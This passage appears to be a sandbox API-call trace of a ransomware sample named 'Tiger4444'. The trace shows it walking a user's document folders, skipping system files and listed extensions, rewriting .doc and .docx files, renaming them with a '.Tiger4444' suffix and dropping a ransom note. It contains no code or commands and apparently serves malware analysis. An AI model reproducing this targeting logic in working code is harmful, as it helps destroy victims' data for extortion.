Size=0x104) returned 0xc75c98 [0047.178] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0047.178] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0047.178] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0047.178] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0047.178] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0047.178] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75c98 | out: hHeap=0xc50000) returned 1 [0047.179] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13863162726) returned 1 [0047.179] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89c20 | out: hHeap=0xc50000) returned 1 [0047.179] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71c80 | out: hHeap=0xc50000) returned 1 [0047.179] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0047.179] CloseHandle (hObject=0x2c8) returned 1 [0047.179] CloseHandle (hObject=0x260) returned 1 [0047.181] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\B5abvTlhU7kaxv-9\\Q9S3eEzzxB5rF.ots.Tiger4444") returned 87 [0047.181] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\B5abvTlhU7kaxv-9\\Q9S3eEzzxB5rF.ots" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\b5abvtlhu7kaxv-9\\q9s3eezzxb5rf.ots"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\B5abvTlhU7kaxv-9\\Q9S3eEzzxB5rF.ots.Tiger4444" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\b5abvtlhu7kaxv-9\\q9s3eezzxb5rf.ots.tiger4444"), dwFlags=0x1) returned 1 [0047.182] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=11632 | out: Addend=0xc6f980) returned 22475888 [0047.182] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=1 | out: Addend=0xc6f98c) returned 4857 [0047.182] FindNextFileW (in: hFindFile=0xc73208, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xda3df530, ftCreationTime.dwHighDateTime=0x1d4cab2, ftLastAccessTime.dwLowDateTime=0xa5d6fd20, ftLastAccessTime.dwHighDateTime=0x1d4cca4, ftLastWriteTime.dwLowDateTime=0xa5d6fd20, ftLastWriteTime.dwHighDateTime=0x1d4cca4, nFileSizeHigh=0x0, nFileSizeLow=0x13c71, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SvK-1oG.docx", cAlternateFileName="SVK-1O~1.DOC")) returned 1 [0047.182] lstrcmpiW (lpString1="SvK-1oG.docx", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0047.182] lstrcmpiW (lpString1="SvK-1oG.docx", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.182] lstrcmpiW (lpString1="SvK-1oG.docx", lpString2="Tiger4444.exe") returned -1 [0047.182] lstrcmpiW (lpString1="SvK-1oG.docx", lpString2=".") returned 1 [0047.182] lstrcmpiW (lpString1="SvK-1oG.docx", lpString2="..") returned 1 [0047.182] lstrcmpiW (lpString1="SvK-1oG.docx", lpString2="windows") returned -1 [0047.182] lstrcmpiW (lpString1="SvK-1oG.docx", lpString2="bootmgr") returned 1 [0047.182] lstrcmpiW (lpString1="SvK-1oG.docx", lpString2="pagefile.sys") returned 1 [0047.182] lstrcmpiW (lpString1="SvK-1oG.docx", lpString2="boot") returned 1 [0047.182] lstrcmpiW (lpString1="SvK-1oG.docx", lpString2="ids.txt") returned 1 [0047.182] lstrcmpiW (lpString1="SvK-1oG.docx", lpString2="NTUSER.DAT") returned 1 [0047.182] lstrcpyW (in: lpString1=0x30aeb20, lpString2="SvK-1oG.docx" | out: lpString1="SvK-1oG.docx") returned="SvK-1oG.docx" [0047.182] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\B5abvTlhU7kaxv-9\\SvK-1oG.docx", dwFileAttributes=0x0) returned 1 [0047.182] lstrlenW (lpString="SvK-1oG.docx") returned 12 [0047.182] lstrlenW (lpString="Tiger4444") returned 9 [0047.182] lstrcmpiW (lpString1="-1oG.docx", lpString2="Tiger4444") returned -1 [0047.182] lstrlenW (lpString=".dll") returned 4 [0047.182] lstrcmpiW (lpString1="docx", lpString2=".dll") returned 1 [0047.182] lstrlenW (lpString=".lnk") returned 4 [0047.182] lstrcmpiW (lpString1="docx", lpString2=".lnk") returned 1 [0047.182] lstrlenW (lpString=".ini") returned 4 [0047.182] lstrcmpiW (lpString1="docx", lpString2=".ini") returned 1 [0047.182] lstrlenW (lpString=".sys") returned 4 [0047.182] lstrcmpiW (lpString1="docx", lpString2=".sys") returned 1 [0047.182] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\B5abvTlhU7kaxv-9\\SvK-1oG.docx" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\b5abvtlhu7kaxv-9\\svk-1og.docx"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0047.183] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0047.183] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13863577144) returned 1 [0047.183] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=81009) returned 1 [0047.183] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89860 [0047.183] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71a60 [0047.183] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13f80, lpName=0x0) returned 0x2c8 [0047.183] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13f80) returned 0xbe0000 [0047.184] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0047.185] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75720 [0047.185] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0047.185] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75608 [0047.185] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0047.185] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75608 | out: hHeap=0xc50000) returned 1 [0047.185] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0047.185] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75720 | out: hHeap=0xc50000) returned 1 [0047.185] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13863800692) returned 1 [0047.185] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89860 | out: hHeap=0xc50000) returned 1 [0047.185] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71a60 | out: hHeap=0xc50000) returned 1 [0047.185] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0047.186] CloseHandle (hObject=0x2c8) returned 1 [0047.186] CloseHandle (hObject=0x260) returned 1 [0047.186] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\B5abvTlhU7kaxv-9\\SvK-1oG.docx.Tiger4444") returned 82 [0047.186] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\B5abvTlhU7kaxv-9\\SvK-1oG.docx" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\b5abvtlhu7kaxv-9\\svk-1og.docx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\B5abvTlhU7kaxv-9\\SvK-1oG.docx.Tiger4444" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\b5abvtlhu7kaxv-9\\svk-1og.docx.tiger4444"), dwFlags=0x1) returned 1 [0047.187] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=81024 | out: Addend=0xc6f980) returned 22487520 [0047.187] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=2 | out: Addend=0xc6f98c) returned 4858 [0047.187] FindNextFileW (in: hFindFile=0xc73208, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8be38260, ftCreationTime.dwHighDateTime=0x1d4d304, ftLastAccessTime.dwLowDateTime=0x38d4b960, ftLastAccessTime.dwHighDateTime=0x1d4c5d8, ftLastWriteTime.dwLowDateTime=0x38d4b960, ftLastWriteTime.dwHighDateTime=0x1d4c5d8, nFileSizeHigh=0x0, nFileSizeLow=0x7da9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tYLtI.doc", cAlternateFileName="")) returned 1 [0047.187] lstrcmpiW (lpString1="tYLtI.doc", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0047.187] lstrcmpiW (lpString1="tYLtI.doc", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.187] lstrcmpiW (lpString1="tYLtI.doc", lpString2="Tiger4444.exe") returned 1 [0047.187] lstrcmpiW (lpString1="tYLtI.doc", lpString2=".") returned 1 [0047.187] lstrcmpiW (lpString1="tYLtI.doc", lpString2="..") returned 1 [0047.187] lstrcmpiW (lpString1="tYLtI.doc", lpString2="windows") returned -1 [0047.187] lstrcmpiW (lpString1="tYLtI.doc", lpString2="bootmgr") returned 1 [0047.187] lstrcmpiW (lpString1="tYLtI.doc", lpString2="pagefile.sys") returned 1 [0047.187] lstrcmpiW (lpString1="tYLtI.doc", lpString2="boot") returned 1 [0047.187] lstrcmpiW (lpString1="tYLtI.doc", lpString2="ids.txt") returned 1 [0047.187] lstrcmpiW (lpString1="tYLtI.doc", lpString2="NTUSER.DAT") returned 1 [0047.187] lstrcpyW (in: lpString1=0x30aeb20, lpString2="tYLtI.doc" | out: lpString1="tYLtI.doc") returned="tYLtI.doc" [0047.187] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\B5abvTlhU7kaxv-9\\tYLtI.doc", dwFileAttributes=0x0) returned 1 [0047.187] lstrlenW (lpString="tYLtI.doc") returned 9 [0047.187] lstrlenW (lpString="Tiger4444") returned 9 [0047.187] lstrcmpiW (lpString1="tYLtI.doc", lpString2="Tiger4444") returned 1 [0047.187] lstrlenW (lpString=".dll") returned 4 [0047.188] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0047.188] lstrlenW (lpString=".lnk") returned 4 [0047.188] lstrcmpiW (lpString1=".doc", lpString2=".lnk") returned -1 [0047.188] lstrlenW (lpString=".ini") returned 4 [0047.188] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0047.188] lstrlenW (lpString=".sys") returned 4 [0047.188] lstrcmpiW (lpString1=".doc", lpString2=".sys") returned -1 [0047.188] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\B5abvTlhU7kaxv-9\\tYLtI.doc" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\b5abvtlhu7kaxv-9\\tylti.doc"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0047.188] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0047.188] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13864094783) returned 1 [0047.188] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=32169) returned 1 [0047.188] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89d10 [0047.188] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71620 [0047.188] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x80b0, lpName=0x0) returned 0x2c8 [0047.188] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x80b0) returned 0xbe0000 [0047.189] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0047.189] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76328 [0047.189] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0047.189] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75950 [0047.189] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0047.190] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75950 | out: hHeap=0xc50000) returned 1 [0047.190] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0047.190] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76328 | out: hHeap=0xc50000) returned 1 [0047.190] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13864276987) returned 1 [0047.190] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89d10 | out: hHeap=0xc50000) returned 1 [0047.190] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71620 | out: hHeap=0xc50000) returned 1 [0047.190] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0047.190] CloseHandle (hObject=0x2c8) returned 1 [0047.190] CloseHandle (hObject=0x260) returned 1 [0047.191] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\B5abvTlhU7kaxv-9\\tYLtI.doc.Tiger4444") returned 79 [0047.191] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\B5abvTlhU7kaxv-9\\tYLtI.doc" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\b5abvtlhu7kaxv-9\\tylti.doc"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\B5abvTlhU7kaxv-9\\tYLtI.doc.Tiger4444" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\b5abvtlhu7kaxv-9\\tylti.doc.tiger4444"), dwFlags=0x1) returned 1 [0047.191] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=32176 | out: Addend=0xc6f980) returned 22568544 [0047.191] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=1 | out: Addend=0xc6f98c) returned 4860 [0047.191] FindNextFileW (in: hFindFile=0xc73208, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8be38260, ftCreationTime.dwHighDateTime=0x1d4d304, ftLastAccessTime.dwLowDateTime=0x38d4b960, ftLastAccessTime.dwHighDateTime=0x1d4c5d8, ftLastWriteTime.dwLowDateTime=0x38d4b960, ftLastWriteTime.dwHighDateTime=0x1d4c5d8, nFileSizeHigh=0x0, nFileSizeLow=0x7da9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tYLtI.doc", cAlternateFileName="")) returned 0 [0047.191] FindClose (in: hFindFile=0xc73208 | out: hFindFile=0xc73208) returned 1 [0047.191] lstrcpyW (in: lpString1=0x30aeb20, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0047.191] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\B5abvTlhU7kaxv-9\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\b5abvtlhu7kaxv-9\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0047.192] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0047.192] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0047.193] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0047.193] CloseHandle (hObject=0x260) returned 1 [0047.193] CloseHandle (hObject=0x2ac) returned 1 [0047.193] GetCurrentThreadId () returned 0xfa8 [0047.193] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66668 [0047.193] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\8IgFx4zl3bMpZVF MD", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\8IgFx4zl3bMpZVF MD") returned="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\8IgFx4zl3bMpZVF MD" [0047.193] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71d08 | out: hHeap=0xc50000) returned 1 [0047.193] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66660 | out: hHeap=0xc50000) returned 1 [0047.193] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\8IgFx4zl3bMpZVF MD" | out: lpString1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\8IgFx4zl3bMpZVF MD") returned="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\8IgFx4zl3bMpZVF MD" [0047.193] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\8IgFx4zl3bMpZVF MD", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\8IgFx4zl3bMpZVF MD\\") returned="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\8IgFx4zl3bMpZVF MD\\" [0047.193] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\8IgFx4zl3bMpZVF MD\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\8IgFx4zl3bMpZVF MD\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\8IgFx4zl3bMpZVF MD\\.BFC0E91B00AE8A0620D3" [0047.193] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\8IgFx4zl3bMpZVF MD\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\8igfx4zl3bmpzvf md\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0047.194] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0047.197] FlushFileBuffers (hFile=0x2ac) returned 1 [0047.198] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\8IgFx4zl3bMpZVF MD\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0047.198] CloseHandle (hObject=0x2ac) returned 1 [0047.199] lstrlenW (lpString="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\8IgFx4zl3bMpZVF MD") returned 61 [0047.199] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0047.199] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\8IgFx4zl3bMpZVF MD\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x73e1420, ftCreationTime.dwHighDateTime=0x1d4d2a6, ftLastAccessTime.dwLowDateTime=0xcdb6d510, ftLastAccessTime.dwHighDateTime=0x1d4d12a, ftLastWriteTime.dwLowDateTime=0x81258645, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72e48 [0047.199] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.199] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0047.199] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0047.199] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0047.199] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x73e1420, ftCreationTime.dwHighDateTime=0x1d4d2a6, ftLastAccessTime.dwLowDateTime=0xcdb6d510, ftLastAccessTime.dwHighDateTime=0x1d4d12a, ftLastWriteTime.dwLowDateTime=0x81258645, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.199] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.199] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0047.199] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0047.199] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0047.199] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0047.199] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x81258645, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x81258645, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x81258645, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0047.199] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.199] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0047.199] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5508e320, ftCreationTime.dwHighDateTime=0x1d4c60c, ftLastAccessTime.dwLowDateTime=0x3373d860, ftLastAccessTime.dwHighDateTime=0x1d4d3ad, ftLastWriteTime.dwLowDateTime=0x3373d860, ftLastWriteTime.dwHighDateTime=0x1d4d3ad, nFileSizeHigh=0x0, nFileSizeLow=0x2993, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ArOyoOdOI6imJTOdUQz.docx", cAlternateFileName="AROYOO~1.DOC")) returned 1 [0047.200] lstrcmpiW (lpString1="ArOyoOdOI6imJTOdUQz.docx", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.200] lstrcmpiW (lpString1="ArOyoOdOI6imJTOdUQz.docx", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.200] lstrcmpiW (lpString1="ArOyoOdOI6imJTOdUQz.docx", lpString2="Tiger4444.exe") returned -1 [0047.200] lstrcmpiW (lpString1="ArOyoOdOI6imJTOdUQz.docx", lpString2=".") returned 1 [0047.200] lstrcmpiW (lpString1="ArOyoOdOI6imJTOdUQz.docx", lpString2="..") returned 1 [0047.200] lstrcmpiW (lpString1="ArOyoOdOI6imJTOdUQz.docx", lpString2="windows") returned -1 [0047.200] lstrcmpiW (lpString1="ArOyoOdOI6imJTOdUQz.docx", lpString2="bootmgr") returned -1 [0047.200] lstrcmpiW (lpString1="ArOyoOdOI6imJTOdUQz.docx", lpString2="pagefile.sys") returned -1 [0047.200] lstrcmpiW (lpString1="ArOyoOdOI6imJTOdUQz.docx", lpString2="boot") returned -1 [0047.200] lstrcmpiW (lpString1="ArOyoOdOI6imJTOdUQz.docx", lpString2="ids.txt") returned -1 [0047.200] lstrcmpiW (lpString1="ArOyoOdOI6imJTOdUQz.docx", lpString2="NTUSER.DAT") returned -1 [0047.200] lstrcpyW (in: lpString1=0x30aeb24, lpString2="ArOyoOdOI6imJTOdUQz.docx" | out: lpString1="ArOyoOdOI6imJTOdUQz.docx") returned="ArOyoOdOI6imJTOdUQz.docx" [0047.200] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\8IgFx4zl3bMpZVF MD\\ArOyoOdOI6imJTOdUQz.docx", dwFileAttributes=0x0) returned 1 [0047.200] lstrlenW (lpString="ArOyoOdOI6imJTOdUQz.docx") returned 24 [0047.200] lstrlenW (lpString="Tiger4444") returned 9 [0047.200] lstrcmpiW (lpString1="dUQz.docx", lpString2="Tiger4444") returned -1 [0047.200] lstrlenW (lpString=".dll") returned 4 [0047.200] lstrcmpiW (lpString1="docx", lpString2=".dll") returned 1 [0047.200] lstrlenW (lpString=".lnk") returned 4 [0047.200] lstrcmpiW (lpString1="docx", lpString2=".lnk") returned 1 [0047.200] lstrlenW (lpString=".ini") returned 4 [0047.200] lstrcmpiW (lpString1="docx", lpString2=".ini") returned 1 [0047.200] lstrlenW (lpString=".sys") returned 4 [0047.200] lstrcmpiW (lpString1="docx", lpString2=".sys") returned 1 [0047.200] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\8IgFx4zl3bMpZVF MD\\ArOyoOdOI6imJTOdUQz.docx" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\8igfx4zl3bmpzvf md\\aroyoodoi6imjtoduqz.docx"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0047.200] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0047.200] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13865360966) returned 1 [0047.201] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=10643) returned 1 [0047.201] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89770 [0047.201] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71730 [0047.201] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2ca0, lpName=0x0) returned 0x2c8 [0047.201] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2ca0) returned 0xbe0000 [0047.201] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 